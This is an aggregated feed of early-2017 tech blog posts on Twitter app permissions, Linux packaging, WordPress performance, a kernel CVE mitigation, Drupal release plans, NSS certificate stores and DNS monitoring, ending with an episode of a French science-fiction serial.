Many other accounts were affected (like the one of the EU Commission). Usually, Twitter accounts are hijacked simply due to weak credentials used to manage them and the lack of controls like 2FA. But this time, it was different. What do all those accounts have in common? They used a 3rd party service called Twitter Counter [Note: the Twitter Counter web site is currently “under maintenance”]. This service, amongst hundreds of others, offers nice features on top of Twitter to offer a better visibility of your account. To achieve this, services request access to your account. Access levels can be multiple from reading your timeline, seeing who you follow, posting Tweets, up to changing your settings. More info is provided here by Twitter. For me,  those services could be considered as plugins for modern CMS. They provide nice features but can also increase the attack surface. That’s exactly the scenario seen today.

How to protect against this kind of attack? First, do not link your Twitter account to untrusted or suspicious applications. And, exactly like mobile apps, do not grant access to everything! Least privileges must be applied. Why allow a statistics service to change your settings if a read-only access to your timeline is sufficient?

Finally, the best advice is to visit the following link at regular interval: https://twitter.com/settings/applications. During your first visit, you could be surprised to find so many applications linked to your account! Here is a small example:

Twitter Apps

Ideally, this list must be reviewed at regular interval and revoke access to applications that you don’t use anymore, to apps that you don’t remind why you granted some permissions or any other suspicious app! Tip: Create a reminder to perform this task every x months.

Oh, don’t forget that the same applies to other social networks too, like Facebook.

Stay safe!

[The post Keep Calm and Revoke Access has been first published on /dev/random]

Next week, it’s already the 10th edition of the TROOPERS conference in Heidelberg, Germany. I’ll be present and cover the event via Twitter and daily wrap-ups. It will be my 3rd edition and since the beginning, I was impressed by the quality of the organization from the content point of view but also from a technical point of view. There isn’t a lot of events that provide SIM cards to use their own mobile network! Besides the classic activities, there is the hacker-run, Packetwars or the charity action with auctions.

The event will be split in two phase: Monday & Tuesday, NGI will take place or “Next Generation Internet” and propose two differents tracks. One focussing on IPv6 and the second on IoT. The schedule is available here. Here is the selection of talks that I’ll (try to) attend and cover:

  • What happened to your home? IoT Hacking and Forensic with 0-day
  • IPv6 Configuration Approaches for Servers
  • IoT to Gateway
  • Dissecting modern (3G/4G) cellular modems
  • RIPE Atlas, Measuring the Internet
  • Hidden in plain sight; How possibly could a decades old standard be broken?
  • An introduction to automotive ECU research
  • PUFs ‘n Stuff: Getting the most of the digital world through physical identities
  • BLE authentication design challenges on smartphone controlled IoT devices: analyzing Gogoro Smart Scooter
  • Metasploit Hardware Bridge Hacking
  • Hacking TP-Link Devices

On Wednesday and Thursday, regular talks are scheduled. There are three concurrent tracks: “Attack & research”, “Defense & management” and “SAP”. Personaly, SAP is less interesting (not working with this monster). Again, here is my current selection (most of them are from the “defense & management” track):

  • Hunting Them All
  • Securing Network Automation
  • Vox Ex Machina
  • Architecting a Modern Defense using Device Guard
  • Exploring North Korea’s Surveillance Technology
  • Arming Small Security Programs: Network Baseline Generation and Alerts with Bropy
  • PHP Internals: Exploit Dev Edition
  • How we hacked Distributed Configuration Management Systems
  • Ruler – Pivoting Through Exchange
  • Demystifying COM
  • Graph me, I’m famous! – Automated static malware analysis and indicator extraction for binaries
  • Windows 10 – Endpoint Security Improvements and the Implant since Windows 2000

Nice program, plenty of interesting topics! Keep an eye here for some wrap-up’s. And, if you’re in Heidelberg, ping me if you want to chat.

 

[The post TROOPER 10 Ahead! has been first published on /dev/random]

I published the following diary on isc.sans.org: “Retro Hunting!“.

For a while, one of the security trends is to integrate information from 3rd-party feeds to improve the detection of suspicious activities. By collecting indicators of compromize, other tools may correlate them with their own data and generate alerts on specific conditions. The initial goal is to share as fast as possible new IOC’s with peers to improve the detection capability and, maybe, prevent further attacks or infections… [Read more]

[The post [SANS ISC Diary] Retro Hunting! has been first published on /dev/random]

Are you a Uni student and interested in hardware, FPGAs or embedded programming? You could get paid to hack by applying to the TimVideos.us organisation for Google Summer of Code!

The TimVideos.us project is participating in Google Summer of Code 2017 (GSoC2017) and is looking for students to hack on the hardware used to record many open source conferences - including;
Linux.conf.aumany PyCons around the world,and DebConf.
LCA2017PyCon AU, pyOhio, Kiwi PyCon & PyCon ZADebConf2016
Due to the focus on hardware, they are very interested in students who are interested in things like FPGAs, VHDL/Verilog and other HDLs, embedded C programming and operating systems and electronic circuit/PCB design.

More details: https://hdmi2usb.tv/gsoc/fpga/hardware/python/linux/2017/03/15/gsoc-announcement !

(Mostly sharing this because this open video hardware might fit FOSDEM very well in the future...)

March 14, 2017

Oracle Linux major releases happen every few years. Oracle Linux 7 is the current version and this was released back in 2014, Oracle Linux 6 is from 2011, etc... When a major release goes out the door, it sort of freezes the various packages at a point in time as well. It locks down which major version of glibc, etc.

Now, that doesn't mean that there won't be anything new added over time, of course security fixes and critical bugfixes get backported from new versions into these various packages and a good number of enhancements/features also get backported over the years. Very much so on the kernel side but in some cases or in a number of cases also in the various userspace packages. However for the most part the focus is on stability and consistency. This is also the case with the different tools and compiler/languages. A concrete example would be, OL7 provides Python 2.7.5. This base release of python will not change in OL7 in newer updates, doing a big chance would break compatibility etc so it's kept stable at 2.7.5.

A very important thing to keep reminding people of, however, again, is the fact that CVEs do get backported into these versions. I often hear someone ask if we ship a newer version of, say, openssl, because some CVE or other is fixed in that newer version - but typically that CVE would also be fixed in the versions we ship with OL. There is a difference between openssl the open source project and CVE's fixed 'upstream' and openssl shipped as part of Oracle Linux versions and maintained and bug fixed overtime with backports from upstream. We take care of critical bugs and security fixes in the current shipping versions.

Anyway - there are other Linux distributions out there that 'evolve' much more frequently and by doing so, out of the box tend to come with newer versions of libraries and tools and packages and that makes it very attractive for developers that are not bound to longer term stability and compatibility. So the developer goes off and installs the latest version of everything and writes their apps using that. That's a fine model in some cases but when you have enterprise apps that might be deployed for many years and have a dependency on certain versions of scripting languages or libraries or what have you, you can't just replace those with something that's much newer, in particular much newer major versions. I am sure many people will agree that if you have an application written in python using 2.7.5 and run that in production, you're not going to let the sysadmin or so just go rip that out and replace it with python 3.5 and assume it all just works and is transparently compatible....

So does that mean we are stuck? No... there is a yum repository called Software Collections Library which we make available to everyone on our freely accessible yum server. That Library gets updated on a regular basis, we are at version 2.3 right now, and it containers newer versions of many popular packages, typically newer compilers, toolkits etc, (such as GCC, Python, PHP, Ruby...) Things that developers want to use and are looking for more recent versions.

The channel is not enabled by default, you have to go in and edit /etc/yum.repos.d/public-yum-ol7.repo and set the ol7_software_collections' repo to enabled=1. When you do that, you can then go and install the different versions that are offered. You can just browse the repo using yum or just look online. (similar channels exist for Oracle Linux 6). When you go and install these different versions, they get installed in /opt and they won't replace the existing versions. So if you have python installed by default with OL7 (2.7.5) and install Python 3.5 from the software collections, this new version goes into /opt/rh/rh-python35. You can then use the scl utility to selectively enable which application uses which version.
An example :

scl enable rh-python35 -- bash 

One little caveat to keep in mind, if you have an early version of OL7 or OL6 installed, we do not modify the /etc/yum.repo.d/public-yum-ol7.repo file after initial installation (because we might overwrite changes you made) so it is always a good idea to get the latest version from our yum server. (You can find them here.) The channel/repo name might have changed or a new one could have been added or so...

As you can see, Oracle Linux is/can be a very current developer platform. The packages are there, they are just provided in a model that keeps stability and consistency. There is no need to go download upstream package source code and compile it yourself and replacing system toolkits/compilers that can cause incompatibilities.

March 13, 2017

Funny how even the software developers at the CIA have problems with idiots who want to put binaries in git. They also know about Git-Flow, my preferred git branching workflow. I kind of wonder how come, if they know about Git-Flow, we see so few leaked NSA and CIA tools with correct semver versioning. Sometimes it’s somewhat okayish, like you can see here. But v1.0-RC3 is not really semver if you see how they got there here. To start with, your alpha versions start with 0.0.x. So where are all those versions under 0.0.x that happened before release candidate 3? 1.0, 1.1-beta, 1.0-phase2, 1.0-beta1-, 1.0-beta-7. WTF guys. That’s not a good versioning scheme. Just call it 0.0.1, 0.0.2, 0.1.0, 0.1.1, 0.1.2 for the betas. And when the thing sees first usage, start calling it 1.0.0, 1.0.1, 1.0.2, 1.1.0, 1.1.1, 1.2.0 etc. What’s wrong with that? And how are all these words like alha-1, beta-2, phase2, etc any better? Maybe just fire your release maintainer! Admittedly for that 2.0.x series they at least tried to get it right.

The point is that packaging tools can be configured to let other packages depend on these version numbers. In x.y.z the x number has implications on API incompatibility whereas the y number can be used for compatible feature additions.

I can imagine that different malwares, exploits, rootkits, intrusion tools they develop would pose incompatibilities with each other, and that for example the NSA and CIA want to share libraries and link without having to recompile or repackage. So versioning to indicate ABI and API compatibility wouldn’t be a bad idea. Let’s hope in the next round of massive leaks we see them having learned good software development processes and practices.

They are doing Scrum sprints and do retrospectives, though. That’s not so bad.

March 10, 2017

I published the following diary on isc.sans.org: “The Side Effect of GeoIP Filters“.

IP location, GeoIP or Geolocalization are terms used to describe techniques to assign geographic locations to IP addresses.  Databases are built and maintained to link the following details to IP addresses:

  • Country
  • Region
  • City
  • Postal code
  • Internet Service Provider
  • Coordinates (Longitude, Latitude)
  • Autonomous system (BGP)

There are many IP location service providers like Maxmind or DB-IP… [Read more]

[The post [SANS ISC Diary] The Side Effect of GeoIP Filters has been first published on /dev/random]

March 09, 2017

The post WordPress on PHP 7.1 appeared first on ma.ttias.be.

Since I care about performance, features and security, I decided to upgrade my webservers' PHP version from 5.6 to the latest PHP 7.1.2. I run mostly WordPress websites, so what's the impact of such a PHP version upgrade on WordPress?

At the time of writing, PHP 5.6 is in extended support, meaning it'll still get security updates, but no more bugfixes. The PHP 7.x release is the only actively support PHP version, of which PHP 7.1 is the latest version.

Let's start with some benchmarks.

Performance improvements with WordPress on PHP 7.1

First, some numbers, before I go all graph on you.

I took a fairly big page on this blog (and a popular one, too) to run the ab benchmark against: Google’s QUIC protocol: moving the web from TCP to UDP.

The goal is to execute 300 requests as quickly as possible, 2 at a time (concurrency = 2).

$ ab -c 2 -n 300 https://ma.ttias.be/googles-quic-protocol-moving-web-tcp-udp/

For the sake of this test, I decided to disable the static HTML caching, I want the raw PHP performance.

The results (averaged out, as I did the test several times) -- lower is better;

  • PHP 5.6: 94.3 seconds
  • PHP 7.1: 74.5 seconds (22% faster)

For comparison, I also took a Laravel application I made called DNS Spy and did the same benchmark.

  • PHP 5.6: 40.1 seconds
  • PHP 7.1: 30.2 seconds (25% faster)

It's safe to assume PHP 7.1 is considerably faster than 5.6 with about 25% raw speed improvements. And this isn't counting the memory savings you get, because the 7.x branch is much more memory efficient than 5.6 (I just didn't accurately measure that to benchmark).

In a graph, the above timings are actually rather boring. In absolute numbers, it's the difference between an average response time of 350ms vs 250ms. Yes, it matters, but in a graph with spikes, it doesn't say much.

Things get more interesting when you look at pages that take more time to load, like the RSS feed in WordPress. This graph shows the RSS timings for the posts and the comments (2 separate requests).

In that graph, it's gone from an average response time of 610ms (for both feeds) to 280 ms. That's a 200% speed improvement over PHP 5.6!

WordPress compatibility on PHP 7.1

The million dollar question is, of course: what did I break by upgrading?

So far: nothing.

But I should point out, most of my blogs have a very limited set of plugins and are simple in both design and functionality.

WordPress itself will run, as a minimum requirement, on PHP 5.2.4 or higher. That's a bug, not a feature. That old PHP version should've been buried and forgotten a long time ago.

But there's an upside, too: because they still support PHP 5.2.x, they can't use any of the newer features of PHP 5.3 (namespacing), PHP 5.4 (anonymous functions), 5.5 (OPCache instead of APC), ... so WordPress core is really boring PHP. That boring PHP will run on pretty much any PHP version, including the 7.x branches.

Plugins are a different matter: popular plugins, like the Yoast SEO Plugin, will actively begin to encourage users to upgrade to a later PHP version. This is excellent news. It also means plugins are going to be your risk when upgrading PHP versions, as their supported PHP versions may vary.

Functionality testing on PHP 7.1

Limited, but this is what I tested (by writing this post) and what still works, flawlessly;

  • Post writing & editing
  • File uploads
  • GUI & text editor
  • Dashboard, WordPress statistics & widgets
  • Plugin updates & auto-updates

Seems to be the biggest pieces of functionality, to me.

PHP warnings & errors

This won't show in the GUI, but your error logs from PHP-FPM may start to show things like this;

$ tail -f php/error.log
[09-Mar-2017 20:41:54 UTC] PHP Warning:  A non-numeric value encountered in /var/www/vhosts/ma.ttias.be/htdocs/wp-content/plugins/.../Abstract.php on line 371
[09-Mar-2017 20:42:17 UTC] PHP Warning:  A non-numeric value encountered in /var/www/vhosts/ma.ttias.be/htdocs/wp-content/plugins/.../Abstract.php on line 371
[09-Mar-2017 20:43:54 UTC] PHP Warning:  A non-numeric value encountered in /var/www/vhosts/ma.ttias.be/htdocs/wp-content/plugins/.../Abstract.php on line 371

Since I have no interest in maintaining plugins and lack the time to learn how SVN works again to submit a PR or patch, I simply disabled warnings in PHP.

Conclusion: WordPress + PHP 7.1 = ❤️

For me, it just works. No quirks, faster performance & a fully supported PHP version.

What's stopping you from upgrading?

The post WordPress on PHP 7.1 appeared first on ma.ttias.be.

The post CVE-2017-2636: Linux local privilege escalation flaw in ‘n_hdlc’ appeared first on ma.ttias.be.

This comes just weeks after the previous local root exploit (CVE-2017-6074 – local privilege escalation in DCCP).

This is an announcement of CVE-2017-2636, which is a race condition in the n_hdlc Linux kernel driver (drivers/tty/n_hdlc.c). It can be exploited to gain a local privilege escalation.

This driver provides HDLC serial line discipline and comes as a kernel module in many Linux distributions, which have CONFIG_N_HDLC=m in the kernel config.

Source: Linux kernel: CVE-2017-2636: local privilege escalation flaw in n_hdlc

Patching is, luckily, relatively trivial, as was the DCCP vulnerability.

$ echo "install n_hdlc /bin/true" >> /etc/modprobe.d/disable-n_hdlc.conf

Make sure to roll that one to your fleet of servers today!

The post CVE-2017-2636: Linux local privilege escalation flaw in ‘n_hdlc’ appeared first on ma.ttias.be.

March 08, 2017

One of the key reasons that Drupal has been successful is because we always made big, forward-looking changes. As a result, Drupal is one of very few CMSes that has stayed relevant for 15+ years. The downside is that with every major release of Drupal, we've gone through a lot of pain adjusting to these changes. The learning curve and difficult upgrade path from one major version of Drupal to the next (e.g. from Drupal 7 to Drupal 8) has also held back Drupal's momentum. In an ideal world, we'd be able to innovate fast yet provide a smooth learning curve and upgrade path from Drupal 8 to Drupal 9. We believe we've found a way to do both!

Upgrading from Drupal 8.2 to Drupal 8.3

Before we can talk about the upgrade path to Drupal 9, it's important to understand how we do releases in Drupal 8. With the release of Drupal 8, we moved Drupal core to use a continuous innovation model. Rather than having to wait for years to get new features, users now get sizable advances in functionality every six months. Furthermore, we committed to providing a smooth upgrade for modules, themes, and distributions from one six-month release to the next.

This new approach is starting to work really well. With the 8.1 and 8.2 updates behind us and 8.3 close to release, we have added some stable improvements like BigPipe and a new status report page, as well as experimental improvements for outside-in, workflows, layouts, and more. We also plan to add important media improvements in 8.4.

Most importantly, upgrading from 8.2 to 8.3 for these new features is not much more complicated than simply updating for a bugfix or security release.

Upgrading from Drupal 8 to Drupal 9

After a lot of discussion among the Drupal core committers and developers, and studying projects like Symfony, we believe that the advantages of Drupal's minor upgrade model (e.g. from Drupal 8.2 to Drupal 8.3) can be translated to major upgrades (e.g. from Drupal 8 to Drupal 9). We see a way to keep innovating while providing a smooth upgrade path and learning curve from Drupal 8 to Drupal 9.

Here is how we will accomplish this: we will continue to introduce new features and backwards-compatible changes in Drupal 8 releases. In the process, we sometimes have to deprecate old systems. Instead of removing old systems, we will keep them in place and encourage module maintainers to update to the new systems. This means that modules and custom code will continue to work. The more we innovate, the more deprecated code there will be in Drupal 8. Over time, maintaining backwards compatibility will become increasingly complex. Eventually, we will reach a point where we simply have too much deprecated code in Drupal 8. At that point, we will choose to remove the deprecated systems and release that as Drupal 9.

This means that Drupal 9.0 should be almost identical to the last Drupal 8 release, minus the deprecated code. It means that when modules take advantage of the latest Drupal 8 APIs and avoid using deprecated code, they should work on Drupal 9. Updating from Drupal 8's latest version to Drupal 9.0.0 should be as easy as updating between minor versions of Drupal 8. It also means that Drupal 9 gives us a clean slate to start innovating more rapidly again.

Why would you upgrade to Drupal 9 then? For the great new features in 9.1. No more features will be added to Drupal 8 after Drupal 9.0. Instead, they will go into Drupal 9.1, 9.2, and so on.

To get the most out of this new approach, we need to make two more improvements. We need to change core so that the exact same module can work with Drupal 8 and 9 if the module developer uses the latest APIs. We also need to provide full data migration from Drupal 6, 7 and 8 to any future release. So long as we make these changes before Drupal 9 and contributed or custom modules take advantage of the latest Drupal 8 APIs, up-to-date sites and modules may just begin using 9.0.0 the day it is is released.

What does this mean for Drupal 7 users?

If you are one of the more than a million sites successfully running on Drupal 7, you might only have one more big upgrade ahead of you.

If you are planning to migrate directly from Drupal 7 to Drupal 9, you should reconsider that approach. In this new model, it might be more beneficial to upgrade to Drupal 8. Once you’ve migrated your site to Drupal 8, subsequent upgrades will be much simpler.

We have more work to do to complete the Drupal 7 to Drupal 8 data migration, but the first Drupal 8 minor release that fully supports it could be 8.4.0, scheduled to be released in October 2017.

What does this mean for Drupal developers?

If you are a module or theme developer, you can continually update to the latest APIs each minor release. Avoid using deprecated code and your module will be compatible with Drupal 9 the day Drupal 9 is released. We have plans to make it easy for developers to identify and update deprecated code.

What does this mean for Drupal core contributors?

If you are a Drupal core contributor and want to introduce new improvements in Drupal core, Drupal 8 is the place to do it! With backwards compatibility layers, even pretty big changes are possible in Drupal 8.

When will Drupal 9 will be released?

We don't know yet, but it shouldn't matter as much either. Innovative Drupal 8 releases will go out on schedule every six months and upgrading to Drupal 9 should become easy. I don't believe we will release Drupal 9 any time soon; we have plenty of features in the works for Drupal 8. Once we know more, we'll follow up with more details.

Thank you

Special thanks to Alex Bronstein, Alex Pott, Gábor Hojtsy, Nathaniel Catchpole and Jess (xjm) for their contributions to this post.

I published the following diary on isc.sans.org: “Not All Malware Samples Are Complex“.

Everyday we hear about new pieces of malware which implement new techniques to hide themselves and defeat analysts. But they are still people who write simple code that just “do the job”. The sample that I’m reviewing today had a very short lifetime because it was quickly detected by most antivirus. Its purpose is to steal information from the infected computers like credentials… [Read more]

[The post [SANS ISC Diary] Not All Malware Samples Are Complex has been first published on /dev/random]

March 06, 2017

I recently created a new article on the Gentoo Wiki titled Certificates which talks about how to handle certificate stores on Gentoo Linux. The write-up of the article (which might still change name later, because it does not handle everything about certificates, mostly how to handle certificate stores) was inspired by the observation that I had to adjust the certificate stores of both Chromium and Firefox separately, even though they both use NSS.

Certificates?

Well, when a secure communication is established from a browser to a site (or any other interaction that uses SSL/TLS, but let's stay with the browser example for now) part of the exchange is to ensure that the target site is actually the site it claims to be. Don't want someone else to trick you into giving your e-mail credentials do you?

To establish this, the certificate presented by the remote site is validated (alongside other handshake steps). A certificate contains a public key, as well as information about what the certificate can be used for, and who (or what) the certificate represents. In case of a site, the identification is (or should be) tied to the fully qualified domain name.

Of course, everyone could create a certificate for accounts.google.com and try to trick you into leaving your credentials. So, part of the validation of a certificate is to verify that it is signed by a third party that you trust to only sign certificates that are trustworthy. And to validate this signature, you hence need the certificate of this third party as well.

So, what about this certificate? Well, turns out, this one is also often signed by another certificate, and so on, until you reach the "top" of the certificate tree. This top certificate is called the "root certificate". And because we still have to establish that this certificate is trustworthy, we need another way to accomplish this.

Enter certificate stores

The root certificates of these trusted third parties (well, let us call them "Certificate Authorities" from now onward, because they sometimes will lose your trust) need to be reachable by the browser. The location where they are stored in is (often) called the truststore (a naming that I came across when dealing with Java and which stuck).

So, what I wanted to accomplish was to remove a particular CA certificate from the certificate store. I assumed that, because Chromium and Firefox both use NSS as the library to support their cryptographic uses, they would also both use the store location at ~/.pki/nssdb. That was wrong.

Another assumption I had was that NSS also uses the /etc/pki/nssdb location as a system-wide one. Wrong again (not that NSS doesn't allow this, but it seems that it is very much up to, and often ignored by, the NSS-implementing applications).

Oh, and I also assumed that there wouldn't be a hard-coded list in the application. Yup. Wrong again.

How NSS tracks root CA

Basically, NSS has a hard-coded root CA list inside the libnssckbi.so file. On Gentoo, this file is provided by the dev-libs/nss package. Because it is hard-coded, it seemed like there was little I could do to remove it, yet still through the user interfaces offered by Firefox and Chromium I was able to remove the trust bits from the certificate.

Turns out that Firefox (inside ~/.mozilla/firefox/*.default) and Chromium (inside ~/.pki/nssdb) store the (modified) trust bits for those locations, so that the hardcoded list does not need to be altered if all I want to do was revoke the trust on a specific CA. And it isn't that this hard-coded list is a bad list: Mozilla has a CA Certificate Program which controls the CAs that are accepted inside this store.

Still, I find it sad that the system-wide location (at /etc/pki/nssdb) is not by default used as well (or I have something wrong on my system that makes it so). On a multi-user system, administrators who want to have some control over the certificate stores might need to either use login scripts to manipulate the user certificate stores, or adapt the user files directly currently.

March 05, 2017

flac

You may have backupped your music cd’s using a single flac file instead of a file for each track. In case you need to split the cd-flac, do this:

Install the needed software:

$ sudo apt-get install cuetools shntool

Split the album flac file into separate tracks:

$ cuebreakpoints sample.cue | shnsplit -o flac sample.flac

Copy the flac tags (if present):

$ cuetag sample.cue split-track*.flac

The full howto can be found here (aidanjm).

Update (April 18th, 2009):
In case the cue file is not a separate file, but included in the flac file itself do this as the first step:

$ metaflac --show-tag=CUESHEET sample.flac | grep -v ^CUESHEET > sample.cue

(NB: The regular syntax is “metaflac –export-cuesheet-to=sample.cue sample.flac“, however often the cue file in embedded in a tag instead of the cuesheet block).

Update (March 5th, 2017):
In case the source file is one unsplitted ape file, you can convert it to flac first.

$ sudo apt-get install ffmpeg

$ ffmpeg -i sample.ape sample.flac


Posted in Uncategorized Tagged: flac, GNU/Linux, music

March 04, 2017

I published the following diary on isc.sans.org: “How your pictures may affect your website reputation“.

In a previous diary, I explained why the automatic processing of IOC’s (“Indicator of Compromise”) could lead to false positives. Here is a practical example found yesterday. I captured the following malicious HTML page (MD5: b55a034d8e4eb4504dfce27c3dfc4ac3)[2]. It is part of a phishing campaign and tries to lure the victim to provide his/her credentials to get access to an Excel sheet… (Read more)

[The post [SANS ISC Diary] How your pictures may affect your website reputation has been first published on /dev/random]

March 03, 2017

The post Log all queries in a Laravel CLI command appeared first on ma.ttias.be.

For most web-based Laravel projects, you can use the excellent laravel-debugbar package to have an in-browser overview of all your queries being executed per page. For commands run via Artisan at the command line, you need an alternative.

This is a method I've used quite often while working on DNS Spy, since most of the application logic is inside worker jobs, executed only via the CLI.

So here's a quick method of logging all your SQL queries to the console output instead.

<php

use Illuminate\Support\Facades\DB;

public function handle()
{
      \DB::listen(function($sql) {
          var_dump($sql->sql);
      });
}
?>

First, import the DB Facade.

Next, add a new listener for every query being executed, and let it var_dump() the query. Alternatively, you can use dump() or dd(), too.

The result;

$ php artisan queue:work
...
string(170) "select * from `xxx` where `xxx`.`record_id` = ? and `xxx`.`record_id` is not null ..."
string(146) "insert into `xxx` (`value`, `nameserver_id`, `ttl`, ... ) values (?, ?, ?, ...)"

Adding a DB listener is a convenient way of seeing all your queries right at the console, for times when the debugbar can't be used!

The post Log all queries in a Laravel CLI command appeared first on ma.ttias.be.

March 02, 2017

After a long time of getting too little attention from me, I decided to make a new cvechecker release. There are few changes in it, but I am planning on making a new release soon with lots of clean-ups.

March 01, 2017

The post DNS Spy enters public beta appeared first on ma.ttias.be.

Here's an exciting announcement I've been dying to make: DNS Spy, a new DNS monitoring and alerting tool I've been working on, has entered public beta!

After several months of development and a 3 month private, invite-only, alpha period, DNS Spy is now publicly available to anyone to try it out.

What is DNS Spy?

I'm glad you ask!

DNS Spy is a custom solution for monitoring, alerting and tracking your DNS changes. It was built primarily out of convenience for the following use cases;

  • Get notified when a project I'm working on changes its DNS (usually for the go-live of a new website or application)
  • Get notified when one of my domains has nameserver records that are out-of-sync because zone transfers failed or the SOA didn't get updated properly
  • Get a back-up of all my DNS records per domain in a convenient format, a necessity that became clear after the massive Dyn DNS DDoS attacks

DNS Spy will never be a tool for the masses. It's a tool for sysadmins, developers and managers that are paranoid about their DNS.

In fact, it's built upon a tool I created more than 6 years ago that did one, simple thing: send me an e-mail whenever a DNS record I cared about, changes value. This is the same tool, on steroids.

Free for Open Source projects

One thing I'm very paranoid about, is the current state of our Open Source projects. While a lot of them have big companies supporting them, the majority is run by volunteers doing everything they can to keep things running.

But due to the nature of Open Source, those projects might become hugely popular on purpose or by accident. Imagine operating a project that's used as a library in an OS, a popular tool or a framework. Suddenly your code gets used in thousands if not millions of applications or hardware.

What would happen if someone managed to hijack your DNS records and set up a phishing site, similar to yours? Would you know? Would your auto-updaters know? Or the package builders that download your .tar.gz files and include your code in their own projects?

I seriously worry about the current state of our DNS and domain names for open source projects. That's why I offer a lifetime premium account to DNS Spy for any open source project maintainer to help secure and monitor their projects.

If someone hijacks your DNS or you make modifications with unexpected results, I hope DNS Spy can offer a solution or guidance.

Feedback, please!

Since it's still in active development, I'm very much looking for feedback, bug reports and enhancements! If you spot anything, do let me know!

And if you'd like to do me a favor, spread word of DNS Spy to colleagues, open source maintainers and internet geeks -- I can use all the publicity in the world. ;-)

The post DNS Spy enters public beta appeared first on ma.ttias.be.

February 28, 2017

Ceci est le billet 44 sur 44 dans la série Printeurs

Nellio, Eva, Max et Junior sont dans la zone contrôlée par le conglomérat industriel.

Dans un silence religieux, nous descendons tous les quatre de la voiture. Tout autour de nous, des immeubles s’élancent dans une architecture torturée donnant une impression d’espace et de vide. Pas la moindre fissure, pas la moindre poussière. Même les plantes ornementales semblent se cantonner dans le rôle restreint et artificiel de nature morte. J’ai l’étrange impression d’être dans une simulation, un rendu 3D d’un projet d’architecture comme on en trouve sur les affiches jouxtant des terrains vagues d’où doivent, bientôt, naître de merveilleux projets immobiliers aux noms évocateurs.

Il me faut un certain temps avant de réaliser qu’aucune publicité n’est visible. Pourtant, les formes des bâtiments s’éloignent avec une certaine élégance d’un fonctionnalisme trop strict. Les murs s’élancent avec une certaine recherche esthétique où les motifs en fractale semblent occuper une place prépondérante.

Une brise un peu brusque dépose soudainement une fine feuille de plastique sur laquelle se distingue difficilement le logo d’une marque de chocolat.

La feuille se pose sur le trottoir et semble s’y enfoncer doucement, comme un fin navire de papier sombrant dans une écume solide.

Je pousse une exclamation de surprise. Junior s’accroupit.

— Du smart sand ! Tout le complexe est en smart sand !

D’un geste de la main, il donne quelques instructions à Max. Obtempérant, celui-ci donne un violent coup dans le mur de béton en utilisant une partie métallique de son corps. Le mur semble s’effriter légèrement. Un trou bien visible se dessine et le sable se met à couler avant de s’arrêter et, sous mes yeux ébahis, de se mettre à escalader le mur pour reboucher le trou. Quelques secondes s’écoulent et le mur semble comme neuf !

Je me tourne vers mes compagnons :

– Je croyais que ce smartsand n’était encore qu’à l’état de prototype. Mais si tout le complexe en est construit, cela a des implications profondes.

Junior me lance un regard étonné.

— C’est impressionnant mais je ne vois pas trop…
— Cela signifie que le bâtiment s’est imprimé tout seul. Un architecte a dessiné les plans et le bâtiment est sorti de terre sans aucune assistance humaine.
— Oui mais où est le problème ?
— Que tout ce complexe peut avoir existé depuis des années ou n’être qu’un leurre, créé de toutes pièces dans les dernières vingt-quatre heures.
— Quel genre de piège ? interroge Max.
— Le bâtiment peut se modifier en fonction de certains stimuli pré-programmés. Nous pouvons très bien nous retrouver enfermés.
— Nous le serions déjà, murmure Eva. Toute la route est dans la même matière et aurait pu nous engloutir.

Je me tourne vers elle.

— Eva, tu m’as dit que tu connaissais FatNerdz. C’est lui qui nous a emmené ici. Peut-on lui faire confiance ?

— Confiance ?

Elle bégaie légèrement, sa lèvre inférieure tremble.

— Il ne s’agit pas de confiance mais uniquement de logique. Tu n’es pas mort, Nellio. Cette seule information devrait te suffire.

Bravement, elle s’avance vers une porte vitrée et, sous mes yeux ahuris, passe simplement à travers comme s’il s’agissait d’un hologramme. Junior exulte !

– Wow ! Du smart glass ! Génial ! Il fond instantanément et se reforme. C’est impressionnant.

Sans hésiter, nous emboitons le pas à Eva. Après tout, nous sommes désormais sous le contrôle total du bâtiment. S’il doit nous arriver quelque chose, il est déjà trop tard.

En franchissant la porte, j’ai l’impression de passer sous une fine chute d’eau. Un léger contact qui s’estompe immédiatement.

Je rejoins Eva, talonné par Max et Junior. Je sens comme une légère vibration et un pincement au creux de l’estomac.

— Nous montons ! Le bâtiment nous pousse vers le haut sans avoir besoin d’un ascenseur. C’est aaaaaah…

Sans prendre la peine de finir sa phrase, Junior se met à hurler. Paniqué, il nous désigne à grand renfort de geste ses pieds. Où plutôt l’endroit où aurait du se trouver ses pieds. À lieu et place de ses chaussures, je vois deux tibias s’enfoncer parfaitement dans le sol.

— Tu t’enfonces ! crie Eva.
— Non, le sol monte mais sans lui, corrige Max de sa voix artificiellement calme et posée.
— Ce n’est vraiment pas le moment d’argumenter à ce sujet, fais-je en me ruant sur Junior.
— Merde ! Merde ! crie ce dernier. Je sens que ça monte.

En effet, le sol est désormais dans la partie supérieure de ses mollets.

— Mais c’est quoi ? Une sorte de sable mouvant ?
— Non, répond Eva. Le bâtiment sais exactement ce qu’il fait.

Comme en écho, une image se forme sur un mur. Une fiche d’identité apparaît avec une photo de Junior, en uniforme, un numéro de matricule et un ensemble de méta-données sur sa vie et sa carrière. En rouge clignote une ligne « Policier déserteur. Dangereux. Protection totale requise. »

Je sens la panique me gagner. Machinalement, je m’approche de Junior pour tenter de le tirer vers le haut. Il hurle de douleur. Sans dire un mot, nous nous affairons tous les trois mais sans succès. Le sol arrive désormais presqu’à la taille de Junior qui se calme subitement.

— Cela devait finir comme cela. Protection totale. Je suis donc à ce point dangereux que toute action est justifiée pour me mettre hors d’état de nuire.
— Il faut faire quelque chose, dis-je. Max, ne peux-tu pas tenter de creuser le béton et que nous le portons au-dessus de nous ?

Eva, qui s’est reculée, me regarde froidement.
— C’est inutile, Nellio. Nous sommes complètement sous l’emprise du bâtiment. Il n’y a rien à faire.
— Mais…

Je tourne la tête vers Junior. Celui-ci tente de me rendre un regard brave. Le sol a désormais dépassé son nombril. Sa respiration se fait plus difficile.

— Je le savais, murmure-t-il. J’étais en sursis. Je suis néanmoins fier. Mais il y’a une chose que je ne comprends pas. Pourquoi suis-je le seul ? Qu’avez-vous de différent ?

Eva s’accroupit pour se mettre à son niveau.
— Cet immeuble est confiant et n’utilise qu’une protection positive : seuls les cas confirmés sont éliminés. Les autres peuvent circuler sans autorisation particulière.
— Ça ne tient pas debout ! Pourquoi serais-je le seul listé ?

Eva réfléchit un instant avant de répondre.

